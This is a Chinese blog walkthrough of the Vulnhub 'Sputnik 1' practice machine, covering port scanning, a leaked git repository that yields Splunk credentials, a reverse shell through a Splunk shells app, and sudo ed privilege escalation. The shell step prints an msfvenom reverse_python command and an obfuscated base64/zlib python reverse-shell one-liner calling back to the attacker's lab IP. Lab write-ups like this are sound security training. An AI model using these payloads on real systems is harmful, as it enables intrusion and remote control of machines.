【Vulnhub靶机】Sputnik 1

已于 2024-07-04 23:52:52 修改
阅读量1.2k 收藏 37
点赞数 37
分类专栏: 【靶机】Vulnhub Walkthrough 文章标签: 网络安全 web安全 linux
于 2024-06-27 23:16:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zzzylty/article/details/140026409
版权

靶机地址:https://download.vulnhub.com/sputnik/Sputnik.ova

信息收集

主机发现

kali ip:192.168.233.128

靶机ip:192.168.233.143

端口扫描

打开了端口 8089、55555 和 61337,端口 55555 具有关联的 IP 地址和 git 存储库的目录链接!

nmap -p- -A 192.168.233.143

对发现的端口进行服务版本扫描

nmap -sV -p 8089,55555,61337 192.168.233.143

访问8089端口

发现是这样的

点击rpc

点击services和servicesNS是一个登录框

点击static

访问55555端口

访问61337端口,splunk enterprise登陆界面

Git库泄露

访问git:http://192.168.233.143:55555/.git/,存在信息泄露

继续访问Logs目录并单击其中的HEAD文件:http://192.168.233.143:55555/.git/logs/HEAD

0000000000000000000000000000000000000000 21b4eb398bdae0799afbbb528468b5c6f580b975 root <root@sputnik.(none)> 1553864873 +0000	clone: from https://github.com/ameerpornillos/flappy.git

有一个Git的链接,看看是怎么个事

对代码仓库进行clone

git clone https://github.com/ameerpornillos/flappy

3.4 源代码结构如下

使用git log命令用于显示代码提交的历史日志记录,在历史记录中找到一个secret记录

git log -p

使用账号密码去访问刚刚的登录页面,也就是61337端口

账号:sputnik

密码:ameer_says_thank_you_and_good_job

Splunk Shell获取

在splunk上安装github公开工具,获取其shell并武器化

GitHub - TBGSecurity/splunk_shells: Weaponizing Splunk with reverse and bind shells.Weaponizing Splunk with reverse and bind shells. . Contribute to TBGSecurity/splunk_shells development by creating an account on GitHub.icon-default.png?t=N7T8https://github.com/TBGSecurity/splunk_shells

Splunk Shells 应用程序版本 1.2

TBG 安全 Ryan Hays

此应用程序可帮助在部署了 Splunk 的环境中进行渗透测试和红队测试。

该应用程序将允许工程师从 Splunk 服务器生成反向绑定 Shell,以允许工程师与服务器交互并扩大环境内的影响力。

下载地址:https://github.com/TBGSecurity/splunk_shells/archive/1.2.tar.gz

然后在splunk中选择"Manage Apps" 并且点击 "Install app from file"

我们向下滚动找到我们的 shell 文件,如下所示。在运行之前,我们需要单击“权限”选项来更改其权限。

在最后一条发现部署上传成功!点击:Permissions,勾选:All apps,点击:Save保存,

点击左上角Apps:Search & Reporting

kali开启监听

| revshell std 192.168.233.128 9999

反弹shell

获得交互式shell

which python

我们使用 Msfvenom 创建了一个 Python 有效负载。

msfvenom -p cmd/unix/reverse_python lhost=192.168.233.128 lport=6666 R

有效载荷通过我们现有的 Netcat 会话上传,需要做的就是将有效载荷粘贴到终端并执行,在执行之前,需要再监听6666端口,也就是Msfvenom 创建一个python交互式shell

python -c "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqFkNELgjAQxv+VsacJMtusKGIPEgYRFaTvkmuhZNvw5v9fY6KP3svx3f2+++DarzW9Q2DkRznkK4ahtr2RCiBoEzpCB9QYcAKzPadsu6M8TSlbp3ha+1Ni869pAiJcpqGRUWWn6nzLyzEvzIr78VIV5SPPrtHsp9JoraQjxGcHg4+JZsYAfQ2WE6DvtlPakLCKV8sIW0b4jFgxv4bKZ9cRnNStTqDB0Q8Avlfx')[0])))"

本地提权

使用sudo命令,查看能够执行哪些sudo命令,发现ed能够以sudo的方式执行

在网站检索ed命令,看看有没有提权的方式,选择sudo的形式,找到提权payload

成功提权 

Skyusec
关注
  • 37
    点赞
  • 37
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络基础——计算机网络的概述
橘子女侠
11-21 430
计算机网络: 1. 定义: 利用通信线路,将地理位置分散的、具有独立功能的许多计算机系统连接起来 并按照某种协议进行数据通信,实现资源共享的信息系统 2.计算机网络在逻辑上可以分为两个子网:资源子网和通信子网。 资源子网:实现资源共享功能的硬件及其软件的集合 通信子网:实现网络通信功能的硬件及其软件的集合 3. 功能: 主要包括:数据通信,资源共享,远程传输,集中管理,分布式处理,负...
vulnhub靶场-Sputnik
qq_42947816的博客
10-16 1622
Sputnik是一款易用级别的boot2root机器,旨在为安全爱好者提供学习和实践危害机器和渗透测试的挑战。
vulnhub靶机DC1
weixin_52450702的博客
10-29 978
靶机DC1IP:192.168.70.160。
vulnhub靶机corrosion1
weixin_52450702的博客
11-18 731
vulnhub靶机corrosion1
Vulnhub靶机-Prime1
m0_74855736的博客
03-08 1042
前面目录扫描可以发现有使用WordPress,现在又获得一个密码,这边尝试wpscan去获得一个用户再配合刚刚获得的一个密码。ls #/home目录在Linux称为主目录,在该目录下面存储的是每个用户的目录。从右侧的页面一个个找php页面且带有提交按钮的,这个目录就是有写权限的。根据前面提示对获得的两个php文件参数的模糊测试,最终在index.php获得一个正确的参数是file。主题编辑器,一般来说从主题编辑器容易有有写权限的一些目录,通过遍历来看看哪些目录有写权限。
[Vulnhub靶机] DC-1
haosha。的博客
05-07 4141
[Vulnhub靶机]DC-1靶机渗透思路及方法(个人分享)
vulnhub靶机:presidential1
weixin_52450702的博客
12-12 806
vulnhub靶机:presidential1
Vulnhub靶机之reven 1
2301_76227305的博客
06-09 736
这个靶机不算难,挺简单的,这些工具的使用也都是常见的。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
靶机vulnhub靶机cybox1
weixin_52450702的博客
02-28 490
vulnhub靶机cybox
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8435
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全】服务基础第一阶段——第八节:Windows系统管理基础---- Web服务与虚拟主机
最新发布
goldfish8848的博客
08-31 1137
万维网WWW是World Wide Web的简称,也称为Web、3W等。WWW是基于客户机/服务器方式的信息发现技术和超文本技术的综合。WWW服务器通过超文本标记语言(HTML)把信息组织称为图文并茂的超文本,利用连接从一个站点跳到另一个站点。这样一来就彻底摆脱了以前查询工具只能按特定路径一步步的查找信息的限制WWW(World Wide Web,万维网)是存储在Internet计算机中数量巨大的文档的集合。这些文档称为页面,它是一种超文本(Hypertext)信息,可以用来描述超媒体。
网络安全网络安全中的常见攻击方式:被动攻击、主动攻击与中间人攻击
一定要站在自己热爱的生活里闪闪发光
08-27 432
在信息化时代,网络安全已经成为企业和个人都非常关注的领域。无论是个人隐私还是企业机密,随着互联网的广泛应用,保护这些信息免受攻击变得越来越重要。攻击者通过各种方式试图获取、篡改或破坏信息,这些方式大致可以分为被动攻击、主动攻击和中间人攻击三类。了解这些攻击方式有助于我们更好地保护自己的信息安全
vulnhub靶机系列:
09-09
1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值